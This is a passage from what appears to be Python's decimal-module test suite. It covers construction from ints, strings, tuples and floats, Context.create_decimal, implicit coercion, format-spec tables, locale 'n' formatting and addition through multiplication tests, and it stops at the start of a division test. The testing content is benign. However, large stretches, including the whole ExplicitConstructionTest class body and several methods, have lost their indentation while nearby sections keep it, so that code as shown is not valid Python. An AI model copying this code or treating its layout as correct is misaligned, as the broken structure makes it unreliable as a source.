                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s when %s disabled" % \
                              (e, s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
                self.context.traps[error] = 0

            # as above, but add traps cumulatively, to check precedence
            ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
            for error in ordered_errors:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s; expected %s" %
                              (type(e), s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
            # reset traps
            for error in ordered_errors:
                self.context.traps[error] = 0

        if DEBUG:
            print("--", self.context)
        try:
            result = str(funct(*vals))
            if fname in self.LogicalFunctions:
                result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
        except Signals[self.decimal] as error:
            self.fail("Raised %s in %s" % (error, s))
        except: #Catch any error long enough to state the test case.
            print("ERROR:", s)
            raise

        myexceptions = self.getexceptions()

        myexceptions.sort(key=repr)
        theirexceptions.sort(key=repr)

        self.assertEqual(result, ans,
                         'Incorrect answer for ' + s + ' -- got ' + result)

        self.assertEqual(myexceptions, theirexceptions,
                         'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))

    def getexceptions(self):
        """Return the list of signals currently flagged in the test context."""
        return [e for e in Signals[self.decimal] if self.context.flags[e]]

    def change_precision(self, prec):
        """Set the context precision (unsafely, for the 32-bit C build)."""
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setprec(prec)
        else:
            self.context.prec = prec

    def change_rounding_method(self, rounding):
        """Set the context rounding mode."""
        self.context.rounding = rounding

    def change_min_exponent(self, exp):
        """Set the context Emin (unsafely, for the 32-bit C build)."""
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemin(exp)
        else:
            self.context.Emin = exp

    def change_max_exponent(self, exp):
        """Set the context Emax (unsafely, for the 32-bit C build)."""
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemax(exp)
        else:
            self.context.Emax = exp

    def change_clamp(self, clamp):
        """Set the context clamp flag."""
        self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the C implementation (_decimal).
    decimal = C
class PyIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the pure-Python implementation.
    decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
    """float inputs convert exactly, including IEEE specials and roundtrips."""
    Decimal = self.decimal.Decimal

    converted = Decimal(0.1)
    self.assertEqual(type(converted), Decimal)
    # Exact binary expansion of the double nearest to 0.1.
    self.assertEqual(
        str(converted),
        '0.1000000000000000055511151231257827021181583404541015625')

    # IEEE specials map onto the corresponding Decimal specials.
    self.assertTrue(Decimal(float('nan')).is_qnan())
    self.assertTrue(Decimal(float('inf')).is_infinite())
    self.assertTrue(Decimal(float('-inf')).is_infinite())
    for source, literal in (('nan', 'NaN'), ('inf', 'Infinity'),
                            ('-inf', '-Infinity'), ('-0.0', '-0')):
        self.assertEqual(str(Decimal(float(source))), str(Decimal(literal)))

    # Conversion is exact, so float -> Decimal -> float roundtrips.
    for _ in range(200):
        sample = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
        self.assertEqual(sample, float(Decimal(sample)))
def test_explicit_context_create_decimal(self):
    """Context.create_decimal: like Decimal(), but applies the context's
    precision/rounding and raises via its traps instead of converting
    exactly.  Also checks NaN payload limits and flag setting."""
    Decimal = self.decimal.Decimal
    InvalidOperation = self.decimal.InvalidOperation
    Rounded = self.decimal.Rounded

    # work on a private copy so the thread's real context is untouched
    nc = copy.copy(self.decimal.getcontext())
    nc.prec = 3

    # empty
    d = Decimal()
    self.assertEqual(str(d), '0')
    d = nc.create_decimal()
    self.assertEqual(str(d), '0')

    # from None
    self.assertRaises(TypeError, nc.create_decimal, None)

    # from int
    d = nc.create_decimal(456)
    self.assertIsInstance(d, Decimal)
    self.assertEqual(nc.create_decimal(45678),
                     nc.create_decimal('457E+2'))

    # from string
    d = Decimal('456789')
    self.assertEqual(str(d), '456789')
    d = nc.create_decimal('456789')
    self.assertEqual(str(d), '4.57E+5')
    # leading and trailing whitespace should result in a NaN;
    # spaces are already checked in Cowlishaw's test-suite, so
    # here we just check that a trailing newline results in a NaN
    self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')

    # from tuples
    d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
    self.assertEqual(str(d), '-4.34913534E-17')
    d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
    self.assertEqual(str(d), '-4.35E-17')  # rounded to prec=3 digits

    # from Decimal
    prevdec = Decimal(500000123)
    d = Decimal(prevdec)
    self.assertEqual(str(d), '500000123')
    d = nc.create_decimal(prevdec)
    self.assertEqual(str(d), '5.00E+8')  # rounded to prec=3 digits

    # more integers
    nc.prec = 28
    nc.traps[InvalidOperation] = True

    for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
              2**31-1, 2**31, 2**63-1, 2**63]:
        d = nc.create_decimal(v)
        self.assertTrue(isinstance(d, Decimal))
        self.assertEqual(int(d), v)

    nc.prec = 3
    nc.traps[Rounded] = True
    self.assertRaises(Rounded, nc.create_decimal, 1234)

    # from string
    nc.prec = 28
    self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
    self.assertEqual(str(nc.create_decimal('45')), '45')
    self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
    self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')

    # invalid arguments
    self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
    self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
    self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")

    # no whitespace and underscore stripping is done with this method
    self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
    self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")

    # too many NaN payload digits
    nc.prec = 3
    self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
    self.assertRaises(InvalidOperation, nc.create_decimal,
                      Decimal('NaN12345'))

    # with the trap disabled, an oversized payload degrades to plain NaN
    # and only raises the InvalidOperation flag
    nc.traps[InvalidOperation] = False
    self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
    self.assertTrue(nc.flags[InvalidOperation])

    nc.flags[InvalidOperation] = False
    self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
    self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
    # Re-run the explicit-construction tests against the C implementation.
    decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
    # Re-run the explicit-construction tests against the pure-Python implementation.
    decimal = P
class ImplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Implicit Construction cases of Decimal.'''

    def test_implicit_from_None(self):
        # None never coerces to Decimal in mixed arithmetic.
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())

    def test_implicit_from_int(self):
        # ints coerce implicitly, regardless of size.
        Decimal = self.decimal.Decimal

        #normal
        self.assertEqual(str(Decimal(5) + 45), '50')
        #exceeding precision
        self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))

    def test_implicit_from_string(self):
        # strings do NOT coerce implicitly (only via the constructor).
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())

    def test_implicit_from_float(self):
        # floats do NOT coerce implicitly in arithmetic.
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())

    def test_implicit_from_Decimal(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))

    def test_rop(self):
        # Decimal must return NotImplemented for unknown operands so that
        # Python falls back to the other operand's reflected methods.
        Decimal = self.decimal.Decimal

        # Allow other classes to be trained to interact with Decimals
        class E:
            def __divmod__(self, other):
                return 'divmod ' + str(other)
            def __rdivmod__(self, other):
                return str(other) + ' rdivmod'
            def __lt__(self, other):
                return 'lt ' + str(other)
            def __gt__(self, other):
                return 'gt ' + str(other)
            def __le__(self, other):
                return 'le ' + str(other)
            def __ge__(self, other):
                return 'ge ' + str(other)
            def __eq__(self, other):
                return 'eq ' + str(other)
            def __ne__(self, other):
                return 'ne ' + str(other)

        self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
        self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
        # '<' reaches E's *reflected* slot __gt__, and so on.
        self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
        self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
        self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
        self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
        self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
        self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')

        # insert operator methods and then exercise them
        oplist = [
            ('+', '__add__', '__radd__'),
            ('-', '__sub__', '__rsub__'),
            ('*', '__mul__', '__rmul__'),
            ('/', '__truediv__', '__rtruediv__'),
            ('%', '__mod__', '__rmod__'),
            ('//', '__floordiv__', '__rfloordiv__'),
            ('**', '__pow__', '__rpow__')
        ]

        # NOTE: the lambdas close over lop/rop late, but each eval runs in
        # the same loop iteration as the setattr, so the current names apply.
        for sym, lop, rop in oplist:
            setattr(E, lop, lambda self, other: 'str' + lop + str(other))
            setattr(E, rop, lambda self, other: str(other) + rop + 'str')
            self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
                             'str' + lop + '10')
            self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
                             '10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
    # Re-run the implicit-construction tests against the C implementation.
    decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
    # Re-run the implicit-construction tests against the pure-Python implementation.
    decimal = P
class FormatTest(unittest.TestCase):
    '''Unit tests for the format function.'''

    def test_formatting(self):
        """Check Decimal.__format__ against a table of
        (format spec, value, expected string) triples."""
        Decimal = self.decimal.Decimal

        # triples giving a format, a Decimal, and the expected result
        test_values = [
            ('e', '0E-15', '0e-15'),
            ('e', '2.3E-15', '2.3e-15'),
            ('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
            ('e', '2.30000E-15', '2.30000e-15'),
            ('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
            ('e', '1.5', '1.5e+0'),
            ('e', '0.15', '1.5e-1'),
            ('e', '0.015', '1.5e-2'),
            ('e', '0.0000000000015', '1.5e-12'),
            ('e', '15.0', '1.50e+1'),
            ('e', '-15', '-1.5e+1'),
            ('e', '0', '0e+0'),
            ('e', '0E1', '0e+1'),
            ('e', '0.0', '0e-1'),
            ('e', '0.00', '0e-2'),
            ('.6e', '0E-15', '0.000000e-9'),
            ('.6e', '0', '0.000000e+6'),
            ('.6e', '9.999999', '9.999999e+0'),
            ('.6e', '9.9999999', '1.000000e+1'),
            ('.6e', '-1.23e5', '-1.230000e+5'),
            ('.6e', '1.23456789e-3', '1.234568e-3'),
            ('f', '0', '0'),
            ('f', '0.0', '0.0'),
            ('f', '0E-2', '0.00'),
            ('f', '0.00E-8', '0.0000000000'),
            ('f', '0E1', '0'), # loses exponent information
            ('f', '3.2E1', '32'),
            ('f', '3.2E2', '320'),
            ('f', '3.20E2', '320'),
            ('f', '3.200E2', '320.0'),
            ('f', '3.2E-6', '0.0000032'),
            ('.6f', '0E-15', '0.000000'), # all zeros treated equally
            ('.6f', '0E1', '0.000000'),
            ('.6f', '0', '0.000000'),
            ('.0f', '0', '0'), # no decimal point
            ('.0f', '0e-2', '0'),
            ('.0f', '3.14159265', '3'),
            ('.1f', '3.14159265', '3.1'),
            ('.4f', '3.14159265', '3.1416'),
            ('.6f', '3.14159265', '3.141593'),
            ('.7f', '3.14159265', '3.1415926'), # round-half-even!
            ('.8f', '3.14159265', '3.14159265'),
            ('.9f', '3.14159265', '3.141592650'),
            ('g', '0', '0'),
            ('g', '0.0', '0.0'),
            ('g', '0E1', '0e+1'),
            ('G', '0E1', '0E+1'),
            ('g', '0E-5', '0.00000'),
            ('g', '0E-6', '0.000000'),
            ('g', '0E-7', '0e-7'),
            ('g', '-0E2', '-0e+2'),
            ('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
            ('.0n', '3.14159265', '3'), # same for 'n'
            ('.1g', '3.14159265', '3'),
            ('.2g', '3.14159265', '3.1'),
            ('.5g', '3.14159265', '3.1416'),
            ('.7g', '3.14159265', '3.141593'),
            ('.8g', '3.14159265', '3.1415926'), # round-half-even!
            ('.9g', '3.14159265', '3.14159265'),
            ('.10g', '3.14159265', '3.14159265'), # don't pad
            ('%', '0E1', '0%'),
            ('%', '0E0', '0%'),
            ('%', '0E-1', '0%'),
            ('%', '0E-2', '0%'),
            ('%', '0E-3', '0.0%'),
            ('%', '0E-4', '0.00%'),
            ('.3%', '0', '0.000%'), # all zeros treated equally
            ('.3%', '0E10', '0.000%'),
            ('.3%', '0E-10', '0.000%'),
            ('.3%', '2.34', '234.000%'),
            ('.3%', '1.234567', '123.457%'),
            ('.0%', '1.23', '123%'),
            ('e', 'NaN', 'NaN'),
            ('f', '-NaN123', '-NaN123'),
            ('+g', 'NaN456', '+NaN456'),
            ('.3e', 'Inf', 'Infinity'),
            ('.16f', '-Inf', '-Infinity'),
            ('.0g', '-sNaN', '-sNaN'),
            ('', '1.00', '1.00'),
            # test alignment and padding
            ('6', '123', '   123'),
            ('<6', '123', '123   '),
            ('>6', '123', '   123'),
            ('^6', '123', ' 123  '),
            ('=+6', '123', '+  123'),
            ('#<10', 'NaN', 'NaN#######'),
            ('#<10', '-4.3', '-4.3######'),
            ('#<+10', '0.0130', '+0.0130###'),
            ('#< 10', '0.0130', ' 0.0130###'),
            ('@>10', '-Inf', '@-Infinity'),
            ('#>5', '-Inf', '-Infinity'),
            ('?^5', '123', '?123?'),
            ('%^6', '123', '%123%%'),
            (' ^6', '-45.6', '-45.6 '),
            ('/=10', '-45.6', '-/////45.6'),
            ('/=+10', '45.6', '+/////45.6'),
            ('/= 10', '45.6', ' /////45.6'),
            ('\x00=10', '-inf', '-\x00Infinity'),
            ('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
            ('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
            ('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
            # thousands separator
            (',', '1234567', '1,234,567'),
            (',', '123456', '123,456'),
            (',', '12345', '12,345'),
            (',', '1234', '1,234'),
            (',', '123', '123'),
            (',', '12', '12'),
            (',', '1', '1'),
            (',', '0', '0'),
            (',', '-1234567', '-1,234,567'),
            (',', '-123456', '-123,456'),
            ('7,', '123456', '123,456'),
            ('8,', '123456', ' 123,456'),
            ('08,', '123456', '0,123,456'), # special case: extra 0 needed
            ('+08,', '123456', '+123,456'), # but not if there's a sign
            (' 08,', '123456', ' 123,456'),
            ('08,', '-123456', '-123,456'),
            ('+09,', '123456', '+0,123,456'),
            # ... with fractional part...
            ('07,', '1234.56', '1,234.56'),
            ('08,', '1234.56', '1,234.56'),
            ('09,', '1234.56', '01,234.56'),
            ('010,', '1234.56', '001,234.56'),
            ('011,', '1234.56', '0,001,234.56'),
            ('012,', '1234.56', '0,001,234.56'),
            ('08,.1f', '1234.5', '01,234.5'),
            # no thousands separators in fraction part
            (',', '1.23456789', '1.23456789'),
            (',%', '123.456789', '12,345.6789%'),
            (',e', '123456', '1.23456e+5'),
            (',E', '123456', '1.23456E+5'),
            # issue 6850
            ('a=-7.0', '0.12345', 'aaaa0.1'),
            # issue 22090
            ('<^+15.20%', 'inf', '<<+Infinity%<<<'),
            ('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
            ('=10.10%', 'NaN123', '   NaN123%'),
            ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)

        # bytes format argument
        self.assertRaises(TypeError, Decimal(1).__format__, b'-020')

    def test_n_format(self):
        """Locale-aware 'n' formatting, driven by injected localeconv-style
        dictionaries instead of the process locale."""
        Decimal = self.decimal.Decimal

        try:
            from locale import CHAR_MAX
        except ImportError:
            self.skipTest('locale.CHAR_MAX not available')

        def make_grouping(lst):
            # The C implementation takes grouping as a string of char codes,
            # the Python implementation takes the list directly.
            return ''.join([chr(x) for x in lst]) if self.decimal == C else lst

        def get_fmt(x, override=None, fmt='n'):
            # The two implementations accept the localeconv override through
            # different __format__ calling conventions.
            if self.decimal == C:
                return Decimal(x).__format__(fmt, override)
            else:
                return Decimal(x).__format__(fmt, _localeconv=override)

        # Set up some localeconv-like dictionaries
        en_US = {
            'decimal_point' : '.',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : ','
            }

        fr_FR = {
            'decimal_point' : ',',
            'grouping' : make_grouping([CHAR_MAX]),
            'thousands_sep' : ''
            }

        ru_RU = {
            'decimal_point' : ',',
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : ' '
            }

        crazy = {
            'decimal_point' : '&',
            'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
            'thousands_sep' : '-'
            }

        dotsep_wide = {
            'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
            }

        self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
        self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')

        self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
        self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
        self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
        self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')

        self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
        self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')

        # zero padding
        self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
        self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')

        self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
        self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')

        self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')

        # wide char separator and decimal point
        self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
                         '-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')

    @run_with_locale('LC_ALL', 'ps_AF')
    def test_wide_char_separator_decimal_point(self):
        # locale with wide char separator and decimal point
        Decimal = self.decimal.Decimal

        decimal_point = locale.localeconv()['decimal_point']
        thousands_sep = locale.localeconv()['thousands_sep']
        if decimal_point != '\u066b':
            self.skipTest('inappropriate decimal point separator '
                          '({!a} not {!a})'.format(decimal_point, '\u066b'))
        if thousands_sep != '\u066c':
            self.skipTest('inappropriate thousands separator '
                          '({!a} not {!a})'.format(thousands_sep, '\u066c'))

        self.assertEqual(format(Decimal('100000000.123'), 'n'),
                         '100\u066c000\u066c000\u066b123')

    def test_decimal_from_float_argument_type(self):
        """from_float on a Decimal subclass passes a plain Decimal
        (not a float) into the subclass __init__."""
        class A(self.decimal.Decimal):
            def __init__(self, a):
                self.a_type = type(a)
        a = A.from_float(42.5)
        self.assertEqual(self.decimal.Decimal, a.a_type)

        a = A.from_float(42)
        self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
    # Re-run the formatting tests against the C implementation.
    decimal = C
class PyFormatTest(FormatTest):
    # Re-run the formatting tests against the pure-Python implementation.
    decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
    '''Unit tests for all arithmetic operators, binary and unary.'''

    def test_addition(self):
        """'+' with two Decimals, Decimal/int on either side, and '+='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('-11.1')
        d2 = Decimal('22.2')

        #two Decimals
        self.assertEqual(d1+d2, Decimal('11.1'))
        self.assertEqual(d2+d1, Decimal('11.1'))

        #with other type, left
        c = d1 + 5
        self.assertEqual(c, Decimal('-6.1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 5 + d1
        self.assertEqual(c, Decimal('-6.1'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 += d2
        self.assertEqual(d1, Decimal('11.1'))

        #inline with other type
        d1 += 5
        self.assertEqual(d1, Decimal('16.1'))

    def test_subtraction(self):
        """'-' with two Decimals, Decimal/int on either side, and '-='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('-11.1')
        d2 = Decimal('22.2')

        #two Decimals
        self.assertEqual(d1-d2, Decimal('-33.3'))
        self.assertEqual(d2-d1, Decimal('33.3'))

        #with other type, left
        c = d1 - 5
        self.assertEqual(c, Decimal('-16.1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 5 - d1
        self.assertEqual(c, Decimal('16.1'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 -= d2
        self.assertEqual(d1, Decimal('-33.3'))

        #inline with other type
        d1 -= 5
        self.assertEqual(d1, Decimal('-38.3'))

    def test_multiplication(self):
        """'*' with two Decimals, Decimal/int on either side, and '*='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('-5')
        d2 = Decimal('3')

        #two Decimals
        self.assertEqual(d1*d2, Decimal('-15'))
        self.assertEqual(d2*d1, Decimal('-15'))

        #with other type, left
        c = d1 * 5
        self.assertEqual(c, Decimal('-25'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 5 * d1
        self.assertEqual(c, Decimal('-25'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 *= d2
        self.assertEqual(d1, Decimal('-15'))

        #inline with other type
        d1 *= 5
        self.assertEqual(d1, Decimal('-75'))

    def test_division(self):
